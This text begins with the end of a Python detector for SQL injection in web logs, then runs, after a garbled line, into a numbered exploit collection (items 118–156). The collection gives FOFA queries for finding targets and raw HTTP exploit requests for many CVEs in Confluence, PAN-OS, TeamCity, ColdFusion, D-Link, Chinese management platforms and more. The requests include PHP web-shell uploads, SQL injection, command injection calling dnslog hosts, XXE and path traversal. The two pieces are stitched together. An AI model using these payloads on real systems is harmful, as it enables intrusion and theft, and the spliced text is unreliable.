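10.0.0.9 - - [12/Mar/2024:10:00:31 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id%5Bwhere%5D=1)and+%2528SELECT+6416+FROM+%2528SELECT%2528SLEEP%25285%2529%2529%2529nEiK%2529--+vqlq HTTP/1.1" 200 77
"""


def fully_decode(path):
    """URL-decode until the string stops changing (bounded), so that
    %2528 -> %28 -> '(' is matched the same way a single-encoded '(' is."""
    for _ in range(3):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify_request(path):
    """Names of the rules that fire on one request path, in rule order."""
    decoded = fully_decode(path)
    return [name for name, rule in SQLI_RULES.items() if rule.search(decoded)]


def scan_access_log(text):
    """One hit per matching log line; lines that do not parse are skipped."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify_request(m["path"])
        if rules:
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"],
                         "status": int(m["status"]), "rules": rules})
    return hits


def hits_by_source(hits):
    """Attempt count per client address, for prioritizing blocks."""
    return dict(Counter(h["ip"] for h in hits))
```

On the constructed log, four of the five lines are flagged: the updatexml request as error-based, the three SLEEP() requests (including the double-encoded one) as time-based, and the plain LayerSlider request is left alone. Matching before decoding would have missed both encoded lines.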
" s+ _3 s' P9 I' C
118. Beijing Byzoro (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then request /home/src.php: the txt_path field controls where the upload is written, so both the name and the location are attacker-chosen.

119. Beijing Byzoro (百绰) Smart S20 back end sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

Time-based: the id field is split on "|" and the first piece is inserted into the query unquoted, so the response is delayed by 5 seconds when the database name is 3 characters long.

120. Beijing Byzoro (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

The file is written to /upload/2.php.

121. Beijing Byzoro (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Byzoro (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement after base64 encoding; plaintext: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass (template injection)
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: visit
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the file path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
